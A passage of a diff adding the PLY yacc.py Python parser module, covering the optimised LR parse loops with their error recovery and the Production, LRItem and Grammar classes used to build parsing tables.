[sym] + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # above as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + self.state = state + p.callable(pslice) + #--! DEBUG + debug.info('Result : %s', format_result(pslice[0])) + #--! DEBUG + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + if t == 0: + n = symstack[-1] + result = getattr(n, 'value', None) + #--! DEBUG + debug.info('Done : Returning %s', format_result(result)) + debug.info('PLY: PARSE DEBUG END') + #--! DEBUG + return result + + if t is None: + + #--! DEBUG + debug.error('Error : %s', + ('%s . %s' % (' '.join([xx.type for xx in symstack][1:]), str(lookahead))).lstrip()) + #--! DEBUG + + # We have some kind of parsing error here. To handle + # this, we are going to push the current token onto + # the tokenstack and replace it with an 'error' token. + # If there are any synchronization rules, they may + # catch it. + # + # In addition to pushing the error token, we call call + # the user defined p_error() function if this is the + # first syntax error. This function is only called if + # errorcount == 0. + if errorcount == 0 or self.errorok: + errorcount = error_count + self.errorok = False + errtoken = lookahead + if errtoken.type == '$end': + errtoken = None # End of file! + if self.errorfunc: + if errtoken and not hasattr(errtoken, 'lexer'): + errtoken.lexer = lexer + self.state = state + tok = call_errorfunc(self.errorfunc, errtoken, self) + if self.errorok: + # User must have done some kind of panic + # mode recovery on their own. The + # returned token is the next lookahead + lookahead = tok + errtoken = None + continue + else: + if errtoken: + if hasattr(errtoken, 'lineno'): + lineno = lookahead.lineno + else: + lineno = 0 + if lineno: + sys.stderr.write('yacc: Syntax error at line %d, token=%s\n' % (lineno, errtoken.type)) + else: + sys.stderr.write('yacc: Syntax error, token=%s' % errtoken.type) + else: + sys.stderr.write('yacc: Parse error in input. EOF\n') + return + + else: + errorcount = error_count + + # case 1: the statestack only has 1 entry on it. If we're in this state, the + # entire parse has been rolled back and we're completely hosed. The token is + # discarded and we just keep going. + + if len(statestack) <= 1 and lookahead.type != '$end': + lookahead = None + errtoken = None + state = 0 + # Nuke the pushback stack + del lookaheadstack[:] + continue + + # case 2: the statestack has a couple of entries on it, but we're + # at the end of the file. nuke the top entry and generate an error token + + # Start nuking entries on the stack + if lookahead.type == '$end': + # Whoa. We're really hosed here. Bail out + return + + if lookahead.type != 'error': + sym = symstack[-1] + if sym.type == 'error': + # Hmmm. Error is on top of stack, we'll just nuke input + # symbol and continue + #--! TRACKING + if tracking: + sym.endlineno = getattr(lookahead, 'lineno', sym.lineno) + sym.endlexpos = getattr(lookahead, 'lexpos', sym.lexpos) + #--! TRACKING + lookahead = None + continue + + # Create the error symbol for the first time and make it the new lookahead symbol + t = YaccSymbol() + t.type = 'error' + + if hasattr(lookahead, 'lineno'): + t.lineno = t.endlineno = lookahead.lineno + if hasattr(lookahead, 'lexpos'): + t.lexpos = t.endlexpos = lookahead.lexpos + t.value = lookahead + lookaheadstack.append(lookahead) + lookahead = t + else: + sym = symstack.pop() + #--! TRACKING + if tracking: + lookahead.lineno = sym.lineno + lookahead.lexpos = sym.lexpos + #--! TRACKING + statestack.pop() + state = statestack[-1] + + continue + + # Call an error function here + raise RuntimeError('yacc: internal parser error!!!\n') + + #--! parsedebug-end + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # parseopt(). + # + # Optimized version of parse() method. DO NOT EDIT THIS CODE DIRECTLY! + # This code is automatically generated by the ply/ygen.py script. Make + # changes to the parsedebug() method instead. + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + def parseopt(self, input=None, lexer=None, debug=False, tracking=False, tokenfunc=None): + #--! parseopt-start + lookahead = None # Current lookahead symbol + lookaheadstack = [] # Stack of lookahead symbols + actions = self.action # Local reference to action table (to avoid lookup on self.) + goto = self.goto # Local reference to goto table (to avoid lookup on self.) + prod = self.productions # Local reference to production list (to avoid lookup on self.) + defaulted_states = self.defaulted_states # Local reference to defaulted states + pslice = YaccProduction(None) # Production object passed to grammar rules + errorcount = 0 # Used during error recovery + + + # If no lexer was given, we will try to use the lex module + if not lexer: + from . import lex + lexer = lex.lexer + + # Set up the lexer and parser objects on pslice + pslice.lexer = lexer + pslice.parser = self + + # If input was supplied, pass to lexer + if input is not None: + lexer.input(input) + + if tokenfunc is None: + # Tokenize function + get_token = lexer.token + else: + get_token = tokenfunc + + # Set the parser() token method (sometimes used in error recovery) + self.token = get_token + + # Set up the state and symbol stacks + + statestack = [] # Stack of parsing states + self.statestack = statestack + symstack = [] # Stack of grammar symbols + self.symstack = symstack + + pslice.stack = symstack # Put in the production + errtoken = None # Err token + + # The start state is assumed to be (0,$end) + + statestack.append(0) + sym = YaccSymbol() + sym.type = '$end' + symstack.append(sym) + state = 0 + while True: + # Get the next symbol on the input. If a lookahead symbol + # is already set, we just use that. Otherwise, we'll pull + # the next token off of the lookaheadstack or from the lexer + + + if state not in defaulted_states: + if not lookahead: + if not lookaheadstack: + lookahead = get_token() # Get the next token + else: + lookahead = lookaheadstack.pop() + if not lookahead: + lookahead = YaccSymbol() + lookahead.type = '$end' + + # Check the action table + ltype = lookahead.type + t = actions[state].get(ltype) + else: + t = defaulted_states[state] + + + if t is not None: + if t > 0: + # shift a symbol on the stack + statestack.append(t) + state = t + + + symstack.append(lookahead) + lookahead = None + + # Decrease error count on successful shift + if errorcount: + errorcount -= 1 + continue + + if t < 0: + # reduce a symbol on the stack, emit a production + p = prod[-t] + pname = p.name + plen = p.len + + # Get production function + sym = YaccSymbol() + sym.type = pname # Production name + sym.value = None + + + if plen: + targ = symstack[-plen-1:] + targ[0] = sym + + #--! TRACKING + if tracking: + t1 = targ[1] + sym.lineno = t1.lineno + sym.lexpos = t1.lexpos + t1 = targ[-1] + sym.endlineno = getattr(t1, 'endlineno', t1.lineno) + sym.endlexpos = getattr(t1, 'endlexpos', t1.lexpos) + #--! TRACKING + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # below as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + del symstack[-plen:] + self.state = state + p.callable(pslice) + del statestack[-plen:] + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + symstack.extend(targ[1:-1]) # Put the production slice back on the stack + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + else: + + #--! TRACKING + if tracking: + sym.lineno = lexer.lineno + sym.lexpos = lexer.lexpos + #--! TRACKING + + targ = [sym] + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # above as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + self.state = state + p.callable(pslice) + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + if t == 0: + n = symstack[-1] + result = getattr(n, 'value', None) + return result + + if t is None: + + + # We have some kind of parsing error here. To handle + # this, we are going to push the current token onto + # the tokenstack and replace it with an 'error' token. + # If there are any synchronization rules, they may + # catch it. + # + # In addition to pushing the error token, we call call + # the user defined p_error() function if this is the + # first syntax error. This function is only called if + # errorcount == 0. + if errorcount == 0 or self.errorok: + errorcount = error_count + self.errorok = False + errtoken = lookahead + if errtoken.type == '$end': + errtoken = None # End of file! + if self.errorfunc: + if errtoken and not hasattr(errtoken, 'lexer'): + errtoken.lexer = lexer + self.state = state + tok = call_errorfunc(self.errorfunc, errtoken, self) + if self.errorok: + # User must have done some kind of panic + # mode recovery on their own. The + # returned token is the next lookahead + lookahead = tok + errtoken = None + continue + else: + if errtoken: + if hasattr(errtoken, 'lineno'): + lineno = lookahead.lineno + else: + lineno = 0 + if lineno: + sys.stderr.write('yacc: Syntax error at line %d, token=%s\n' % (lineno, errtoken.type)) + else: + sys.stderr.write('yacc: Syntax error, token=%s' % errtoken.type) + else: + sys.stderr.write('yacc: Parse error in input. EOF\n') + return + + else: + errorcount = error_count + + # case 1: the statestack only has 1 entry on it. If we're in this state, the + # entire parse has been rolled back and we're completely hosed. The token is + # discarded and we just keep going. + + if len(statestack) <= 1 and lookahead.type != '$end': + lookahead = None + errtoken = None + state = 0 + # Nuke the pushback stack + del lookaheadstack[:] + continue + + # case 2: the statestack has a couple of entries on it, but we're + # at the end of the file. nuke the top entry and generate an error token + + # Start nuking entries on the stack + if lookahead.type == '$end': + # Whoa. We're really hosed here. Bail out + return + + if lookahead.type != 'error': + sym = symstack[-1] + if sym.type == 'error': + # Hmmm. Error is on top of stack, we'll just nuke input + # symbol and continue + #--! TRACKING + if tracking: + sym.endlineno = getattr(lookahead, 'lineno', sym.lineno) + sym.endlexpos = getattr(lookahead, 'lexpos', sym.lexpos) + #--! TRACKING + lookahead = None + continue + + # Create the error symbol for the first time and make it the new lookahead symbol + t = YaccSymbol() + t.type = 'error' + + if hasattr(lookahead, 'lineno'): + t.lineno = t.endlineno = lookahead.lineno + if hasattr(lookahead, 'lexpos'): + t.lexpos = t.endlexpos = lookahead.lexpos + t.value = lookahead + lookaheadstack.append(lookahead) + lookahead = t + else: + sym = symstack.pop() + #--! TRACKING + if tracking: + lookahead.lineno = sym.lineno + lookahead.lexpos = sym.lexpos + #--! TRACKING + statestack.pop() + state = statestack[-1] + + continue + + # Call an error function here + raise RuntimeError('yacc: internal parser error!!!\n') + + #--! parseopt-end + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # parseopt_notrack(). + # + # Optimized version of parseopt() with line number tracking removed. + # DO NOT EDIT THIS CODE DIRECTLY. This code is automatically generated + # by the ply/ygen.py script. Make changes to the parsedebug() method instead. + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + def parseopt_notrack(self, input=None, lexer=None, debug=False, tracking=False, tokenfunc=None): + #--! parseopt-notrack-start + lookahead = None # Current lookahead symbol + lookaheadstack = [] # Stack of lookahead symbols + actions = self.action # Local reference to action table (to avoid lookup on self.) + goto = self.goto # Local reference to goto table (to avoid lookup on self.) + prod = self.productions # Local reference to production list (to avoid lookup on self.) + defaulted_states = self.defaulted_states # Local reference to defaulted states + pslice = YaccProduction(None) # Production object passed to grammar rules + errorcount = 0 # Used during error recovery + + + # If no lexer was given, we will try to use the lex module + if not lexer: + from . import lex + lexer = lex.lexer + + # Set up the lexer and parser objects on pslice + pslice.lexer = lexer + pslice.parser = self + + # If input was supplied, pass to lexer + if input is not None: + lexer.input(input) + + if tokenfunc is None: + # Tokenize function + get_token = lexer.token + else: + get_token = tokenfunc + + # Set the parser() token method (sometimes used in error recovery) + self.token = get_token + + # Set up the state and symbol stacks + + statestack = [] # Stack of parsing states + self.statestack = statestack + symstack = [] # Stack of grammar symbols + self.symstack = symstack + + pslice.stack = symstack # Put in the production + errtoken = None # Err token + + # The start state is assumed to be (0,$end) + + statestack.append(0) + sym = YaccSymbol() + sym.type = '$end' + symstack.append(sym) + state = 0 + while True: + # Get the next symbol on the input. If a lookahead symbol + # is already set, we just use that. Otherwise, we'll pull + # the next token off of the lookaheadstack or from the lexer + + + if state not in defaulted_states: + if not lookahead: + if not lookaheadstack: + lookahead = get_token() # Get the next token + else: + lookahead = lookaheadstack.pop() + if not lookahead: + lookahead = YaccSymbol() + lookahead.type = '$end' + + # Check the action table + ltype = lookahead.type + t = actions[state].get(ltype) + else: + t = defaulted_states[state] + + + if t is not None: + if t > 0: + # shift a symbol on the stack + statestack.append(t) + state = t + + + symstack.append(lookahead) + lookahead = None + + # Decrease error count on successful shift + if errorcount: + errorcount -= 1 + continue + + if t < 0: + # reduce a symbol on the stack, emit a production + p = prod[-t] + pname = p.name + plen = p.len + + # Get production function + sym = YaccSymbol() + sym.type = pname # Production name + sym.value = None + + + if plen: + targ = symstack[-plen-1:] + targ[0] = sym + + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # below as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + del symstack[-plen:] + self.state = state + p.callable(pslice) + del statestack[-plen:] + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + symstack.extend(targ[1:-1]) # Put the production slice back on the stack + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + else: + + + targ = [sym] + + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + # The code enclosed in this section is duplicated + # above as a performance optimization. Make sure + # changes get made in both locations. + + pslice.slice = targ + + try: + # Call the grammar rule with our special slice object + self.state = state + p.callable(pslice) + symstack.append(sym) + state = goto[statestack[-1]][pname] + statestack.append(state) + except SyntaxError: + # If an error was set. Enter error recovery state + lookaheadstack.append(lookahead) # Save the current lookahead token + statestack.pop() # Pop back one state (before the reduce) + state = statestack[-1] + sym.type = 'error' + sym.value = 'error' + lookahead = sym + errorcount = error_count + self.errorok = False + + continue + # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + if t == 0: + n = symstack[-1] + result = getattr(n, 'value', None) + return result + + if t is None: + + + # We have some kind of parsing error here. To handle + # this, we are going to push the current token onto + # the tokenstack and replace it with an 'error' token. + # If there are any synchronization rules, they may + # catch it. + # + # In addition to pushing the error token, we call call + # the user defined p_error() function if this is the + # first syntax error. This function is only called if + # errorcount == 0. + if errorcount == 0 or self.errorok: + errorcount = error_count + self.errorok = False + errtoken = lookahead + if errtoken.type == '$end': + errtoken = None # End of file! + if self.errorfunc: + if errtoken and not hasattr(errtoken, 'lexer'): + errtoken.lexer = lexer + self.state = state + tok = call_errorfunc(self.errorfunc, errtoken, self) + if self.errorok: + # User must have done some kind of panic + # mode recovery on their own. The + # returned token is the next lookahead + lookahead = tok + errtoken = None + continue + else: + if errtoken: + if hasattr(errtoken, 'lineno'): + lineno = lookahead.lineno + else: + lineno = 0 + if lineno: + sys.stderr.write('yacc: Syntax error at line %d, token=%s\n' % (lineno, errtoken.type)) + else: + sys.stderr.write('yacc: Syntax error, token=%s' % errtoken.type) + else: + sys.stderr.write('yacc: Parse error in input. EOF\n') + return + + else: + errorcount = error_count + + # case 1: the statestack only has 1 entry on it. If we're in this state, the + # entire parse has been rolled back and we're completely hosed. The token is + # discarded and we just keep going. + + if len(statestack) <= 1 and lookahead.type != '$end': + lookahead = None + errtoken = None + state = 0 + # Nuke the pushback stack + del lookaheadstack[:] + continue + + # case 2: the statestack has a couple of entries on it, but we're + # at the end of the file. nuke the top entry and generate an error token + + # Start nuking entries on the stack + if lookahead.type == '$end': + # Whoa. We're really hosed here. Bail out + return + + if lookahead.type != 'error': + sym = symstack[-1] + if sym.type == 'error': + # Hmmm. Error is on top of stack, we'll just nuke input + # symbol and continue + lookahead = None + continue + + # Create the error symbol for the first time and make it the new lookahead symbol + t = YaccSymbol() + t.type = 'error' + + if hasattr(lookahead, 'lineno'): + t.lineno = t.endlineno = lookahead.lineno + if hasattr(lookahead, 'lexpos'): + t.lexpos = t.endlexpos = lookahead.lexpos + t.value = lookahead + lookaheadstack.append(lookahead) + lookahead = t + else: + sym = symstack.pop() + statestack.pop() + state = statestack[-1] + + continue + + # Call an error function here + raise RuntimeError('yacc: internal parser error!!!\n') + + #--! parseopt-notrack-end + +# ----------------------------------------------------------------------------- +# === Grammar Representation === +# +# The following functions, classes, and variables are used to represent and +# manipulate the rules that make up a grammar. +# ----------------------------------------------------------------------------- + +# regex matching identifiers +_is_identifier = re.compile(r'^[a-zA-Z0-9_-]+$') + +# ----------------------------------------------------------------------------- +# class Production: +# +# This class stores the raw information about a single production or grammar rule. +# A grammar rule refers to a specification such as this: +# +# expr : expr PLUS term +# +# Here are the basic attributes defined on all productions +# +# name - Name of the production. For example 'expr' +# prod - A list of symbols on the right side ['expr','PLUS','term'] +# prec - Production precedence level +# number - Production number. +# func - Function that executes on reduce +# file - File where production function is defined +# lineno - Line number where production function is defined +# +# The following attributes are defined or optional. +# +# len - Length of the production (number of symbols on right hand side) +# usyms - Set of unique symbols found in the production +# ----------------------------------------------------------------------------- + +class Production(object): + reduced = 0 + def __init__(self, number, name, prod, precedence=('right', 0), func=None, file='', line=0): + self.name = name + self.prod = tuple(prod) + self.number = number + self.func = func + self.callable = None + self.file = file + self.line = line + self.prec = precedence + + # Internal settings used during table construction + + self.len = len(self.prod) # Length of the production + + # Create a list of unique production symbols used in the production + self.usyms = [] + for s in self.prod: + if s not in self.usyms: + self.usyms.append(s) + + # List of all LR items for the production + self.lr_items = [] + self.lr_next = None + + # Create a string representation + if self.prod: + self.str = '%s -> %s' % (self.name, ' '.join(self.prod)) + else: + self.str = '%s -> ' % self.name + + def __str__(self): + return self.str + + def __repr__(self): + return 'Production(' + str(self) + ')' + + def __len__(self): + return len(self.prod) + + def __nonzero__(self): + return 1 + + def __getitem__(self, index): + return self.prod[index] + + # Return the nth lr_item from the production (or None if at the end) + def lr_item(self, n): + if n > len(self.prod): + return None + p = LRItem(self, n) + # Precompute the list of productions immediately following. + try: + p.lr_after = Prodnames[p.prod[n+1]] + except (IndexError, KeyError): + p.lr_after = [] + try: + p.lr_before = p.prod[n-1] + except IndexError: + p.lr_before = None + return p + + # Bind the production function name to a callable + def bind(self, pdict): + if self.func: + self.callable = pdict[self.func] + +# This class serves as a minimal standin for Production objects when +# reading table data from files. It only contains information +# actually used by the LR parsing engine, plus some additional +# debugging information. +class MiniProduction(object): + def __init__(self, str, name, len, func, file, line): + self.name = name + self.len = len + self.func = func + self.callable = None + self.file = file + self.line = line + self.str = str + + def __str__(self): + return self.str + + def __repr__(self): + return 'MiniProduction(%s)' % self.str + + # Bind the production function name to a callable + def bind(self, pdict): + if self.func: + self.callable = pdict[self.func] + + +# ----------------------------------------------------------------------------- +# class LRItem +# +# This class represents a specific stage of parsing a production rule. For +# example: +# +# expr : expr . PLUS term +# +# In the above, the "." represents the current location of the parse. Here +# basic attributes: +# +# name - Name of the production. For example 'expr' +# prod - A list of symbols on the right side ['expr','.', 'PLUS','term'] +# number - Production number. +# +# lr_next Next LR item. Example, if we are ' expr -> expr . PLUS term' +# then lr_next refers to 'expr -> expr PLUS . term' +# lr_index - LR item index (location of the ".") in the prod list. +# lookaheads - LALR lookahead symbols for this item +# len - Length of the production (number of symbols on right hand side) +# lr_after - List of all productions that immediately follow +# lr_before - Grammar symbol immediately before +# ----------------------------------------------------------------------------- + +class LRItem(object): + def __init__(self, p, n): + self.name = p.name + self.prod = list(p.prod) + self.number = p.number + self.lr_index = n + self.lookaheads = {} + self.prod.insert(n, '.') + self.prod = tuple(self.prod) + self.len = len(self.prod) + self.usyms = p.usyms + + def __str__(self): + if self.prod: + s = '%s -> %s' % (self.name, ' '.join(self.prod)) + else: + s = '%s -> ' % self.name + return s + + def __repr__(self): + return 'LRItem(' + str(self) + ')' + +# ----------------------------------------------------------------------------- +# rightmost_terminal() +# +# Return the rightmost terminal from a list of symbols. Used in add_production() +# ----------------------------------------------------------------------------- +def rightmost_terminal(symbols, terminals): + i = len(symbols) - 1 + while i >= 0: + if symbols[i] in terminals: + return symbols[i] + i -= 1 + return None + +# ----------------------------------------------------------------------------- +# === GRAMMAR CLASS === +# +# The following class represents the contents of the specified grammar along +# with various computed properties such as first sets, follow sets, LR items, etc. +# This data is used for critical parts of the table generation process later. +# ----------------------------------------------------------------------------- + +class GrammarError(YaccError): + pass + +class Grammar(object): + def __init__(self, terminals): + self.Productions = [None] # A list of all of the productions. The first + # entry is always reserved for the purpose of + # building an augmented grammar + + self.Prodnames = {} # A dictionary mapping the names of nonterminals to a list of all + # productions of that nonterminal. + + self.Prodmap = {} # A dictionary that is only used to detect duplicate + # productions. + + self.Terminals = {} # A dictionary mapping the names of terminal symbols to a + # list of the rules where they are used. + + for term in terminals: + self.Terminals[term] = [] + + self.Terminals['error'] = [] + + self.Nonterminals = {} # A dictionary mapping names of nonterminals to a list + # of rule numbers where they are used. + + self.First = {} # A dictionary of precomputed FIRST(x) symbols + + self.Follow = {} # A dictionary of precomputed FOLLOW(x) symbols + + self.Precedence = {} # Precedence rules for each terminal. Contains tuples of the + # form ('right',level) or ('nonassoc', level) or ('left',level) + + self.UsedPrecedence = set() # Precedence rules that were actually used by the grammer. + # This is only used to provide error checking and to generate + # a warning about unused precedence rules. + + self.Start = None # Starting symbol for the grammar + + + def __len__(self): + return len(self.Productions) + + def __getitem__(self, index): + return self.Productions[index] + + # ----------------------------------------------------------------------------- + # set_precedence() + # + # Sets the precedence for a given terminal. assoc is the associativity such as + # 'left','right', or 'nonassoc'. level is a numeric level. + # + # ----------------------------------------------------------------------------- + + def set_precedence(self, term, assoc, level): + assert self.Productions == [None], 'Must call set_precedence() before add_production()' + if term in self.Precedence: + raise GrammarError('Precedence already specified for terminal %r' % term) + if assoc not in ['left', 'right', 'nonassoc']: + raise GrammarError("Associativity must be one of 'left','right', or 'nonassoc'") + self.Precedence[term] = (assoc, level) + + # ----------------------------------------------------------------------------- + # add_production() + # + # Given an action function, this function assembles a production rule and + # computes its precedence level. + # + # The production rule is supplied as a list of symbols. For example, + # a rule such as 'expr : expr PLUS term' has a production name of 'expr' and + # symbols ['expr','PLUS','term']. + # + # Precedence is determined by the precedence of the right-most non-terminal + # or the precedence of a terminal specified by %prec. + # + # A variety of error checks are performed to make sure production symbols + # are valid and that %prec is used correctly. + # ----------------------------------------------------------------------------- + + def add_production(self, prodname, syms, func=None, file='', line=0): + + if prodname in self.Terminals: + raise GrammarError('%s:%d: Illegal rule name %r. Already defined as a token' % (file, line, prodname)) + if prodname == 'error': + raise GrammarError('%s:%d: Illegal rule name %r. error is a reserved word' % (file, line, prodname)) + if not _is_identifier.match(prodname): + raise GrammarError('%s:%d: Illegal rule name %r' % (file, line, prodname)) + + # Look for literal tokens + for n, s in enumerate(syms): + if s[0] in "'\"": + try: + c = eval(s) + if (len(c) > 1): + raise GrammarError('%s:%d: Literal token %s in rule %r may only be a single character' % + (file, line, s, prodname)) + if c not in self.Terminals: + self.Terminals[c] = [] + syms[n] = c + continue + except SyntaxError: + pass + if not _is_identifier.match(s) and s != '%prec': + raise GrammarError('%s:%d: Illegal name %r in rule %r' % (file, line, s, prodname)) + + # Determine the precedence level + if '%prec' in syms: + if syms[-1] == '%prec': + raise GrammarError('%s:%d: Syntax error. Nothing follows %%prec' % (file, line)) + if syms[-2] != '%prec': + raise GrammarError('%s:%d: Syntax error. %%prec can only appear at the end of a grammar rule' % + (file, line)) + precname = syms[-1] + prodprec = self.Precedence.get(precname) + if not prodprec: + raise GrammarError('%s:%d: Nothing known about the precedence of %r' % (file, line, precname)) + else: + self.UsedPrecedence.add(precname) + del syms[-2:] # Drop %prec from the rule + else: + # If no %prec, precedence is determined by the rightmost terminal symbol + precname = rightmost_terminal(syms, self.Terminals) + prodprec = self.Precedence.get(precname, ('right', 0)) + + # See if the rule is already in the rulemap + map = '%s -> %s' % (prodname, syms) + if map in self.Prodmap: + m = self.Prodmap[map] + raise GrammarError('%s:%d: Duplicate rule %s. ' % (file, line, m) + + 'Previous definition at %s:%d' % (m.file, m.line)) + + # From this point on, everything is valid. Create a new Production instance + pnumber = len(self.Productions) + if prodname not in self.Nonterminals: + self.Nonterminals[prodname] = [] + + # Add the production number to Terminals and Nonterminals + for t in syms: + if t in self.Terminals: + self.Terminals[t].append(pnumber) + else: + if t not in self.Nonterminals: + self.Nonterminals[t] = [] + self.Nonterminals[t].append(pnumber) + + # Create a production and add it to the list of productions + p = Production(pnumber, prodname, syms, prodprec, func, file, line) + self.Productions.append(p) + self.Prodmap[map] = p + + # Add to the global productions list + try: + self.Prodnames[prodname].append(p) + except KeyError: + self.Prodnames[prodname] = [p] + + # ----------------------------------------------------------------------------- + # set_start() + # + # Sets the starting symbol and creates the augmented grammar. Production + # rule 0 is S' -> start where start is the start symbol. + # ----------------------------------------------------------------------------- + + def set_start(self, start=None): + if not start: + start = self.Productions[1].name + if start not in self.Nonterminals: + raise GrammarError('start symbol %s undefined' % start) + self.Productions[0] = Production(0, "S'", [start]) + self.Nonterminals[start].append(0) + self.Start = start + + # ----------------------------------------------------------------------------- + # find_unreachable() + # + # Find all of the nonterminal symbols that can't be reached from the starting + # symbol. Returns a list of nonterminals that can't be reached. + # ----------------------------------------------------------------------------- + + def find_unreachable(self): + + # Mark all symbols that are reachable from a symbol s + def mark_reachable_from(s): + if s in reachable: + return + reachable.add(s) + for p in self.Prodnames.get(s, []): + for r in p.prod: + mark_reachable_from(r) + + reachable = set() + mark_reachable_from(self.Productions[0].prod[0]) + return [s for s in self.Nonterminals if s not in reachable] + + # ----------------------------------------------------------------------------- + # infinite_cycles() + # + # This function looks at the various parsing rules and tries to detect + # infinite recursion cycles (grammar rules where there is no possible way + # to derive a string of only terminals). + # ----------------------------------------------------------------------------- + + def infinite_cycles(self): + terminates = {} + + # Terminals: + for t in self.Terminals: + terminates[t] = True + + terminates['$end'] = True + + # Nonterminals: + + # Initialize to false: + for n in self.Nonterminals: + terminates[n] = False + + # Then propagate termination until no change: + while True: + some_change = False + for (n, pl) in self.Prodnames.items(): + # Nonterminal n terminates iff any of its productions terminates. + for p in pl: + # Production p terminates iff all of its rhs symbols terminate. + for s in p.prod: + if not terminates[s]: + # The symbol s does not terminate, + # so production p does not terminate. + p_terminates = False + break + else: + # didn't break from the loop, + # so every symbol s terminates + # so production p terminates. + p_terminates = True + + if p_terminates: + # symbol n terminates! + if not terminates[n]: + terminates[n] = True + some_change = True + # Don't need to consider any more productions for this n. + break + + if not some_change: + break + + infinite = [] + for (s, term) in terminates.items(): + if not term: + if s not in self.Prodnames and s not in self.Terminals and s != 'error': + # s is used-but-not-defined, and we've already warned of that, + # so it would be overkill to say that it's also non-terminating. + pass + else: + infinite.append(s) + + return infinite + + # ----------------------------------------------------------------------------- + # undefined_symbols() + # + # Find all symbols that were used the grammar, but not defined as tokens or + # grammar rules. Returns a list of tuples (sym, prod) where sym in the symbol + # and prod is the production where the symbol was used. + # ----------------------------------------------------------------------------- + def undefined_symbols(self): + result = [] + for p in self.Productions: + if not p: + continue + + for s in p.prod: + if s not in self.Prodnames and s not in self.Terminals and s != 'error': + result.append((s, p)) + return result + + # ----------------------------------------------------------------------------- + # unused_terminals() + # + # Find all terminals that were defined, but not used by the grammar. Returns + # a list of all symbols. + # ----------------------------------------------------------------------------- + def unused_terminals(self): + unused_tok = [] + for s, v in self.Terminals.items(): + if s != 'error' and not v: + unused_tok.append(s) + + return unused_tok + + # ------------------------------------------------------------------------------ + # unused_rules() + # + # Find all grammar rules that were defined, but not used (maybe not reachable) + # Returns a list of productions. + # ------------------------------------------------------------------------------ + + def unused_rules(self): + unused_prod = [] + for s, v in self.Nonterminals.items(): + if not v: + p = self.Prodnames[s][0] + unused_prod.append(p) + return unused_prod + + # ----------------------------------------------------------------------------- + # unused_precedence() + # + # Returns a list of tuples (term,precedence) corresponding to precedence + # rules that were never used by the grammar. term is the name of the terminal + # on which precedence was applied and precedence is a string such as 'left' or + # 'right' corresponding to the type of precedence. + # ----------------------------------------------------------------------------- + + def unused_precedence(self): + unused = [] + for termname in self.Precedence: + if not (termname in self.Terminals or termname in self.UsedPrecedence): + unused.append((termname, self.Precedence[termname][0])) + + return unused + + # ------------------------------------------------------------------------- + # _first() + # + # Compute the value of FIRST1(beta) where beta is a tuple of symbols. + # + # During execution of compute_first1, the result may be incomplete. + # Afterward (e.g., when called from compute_follow()), it will be complete. + # ------------------------------------------------------------------------- + def _first(self, beta): + + # We are computing First(x1,x2,x3,...,xn) + result = [] + for x in beta: + x_produces_empty = False + + # Add all the non- symbols of First[x] to the result. + for f in self.First[x]: + if f == '': + x_produces_empty = True + else: + if f not in result: + result.append(f) + + if x_produces_empty: + # We have to consider the next x in beta, + # i.e. stay in the loop. + pass + else: + # We don't have to consider any further symbols in beta. + break + else: + # There was no 'break' from the loop, + # so x_produces_empty was true for all x in beta, + # so beta produces empty as well. + result.append('') + + return result + + # ------------------------------------------------------------------------- + # compute_first() + # + # Compute the value of 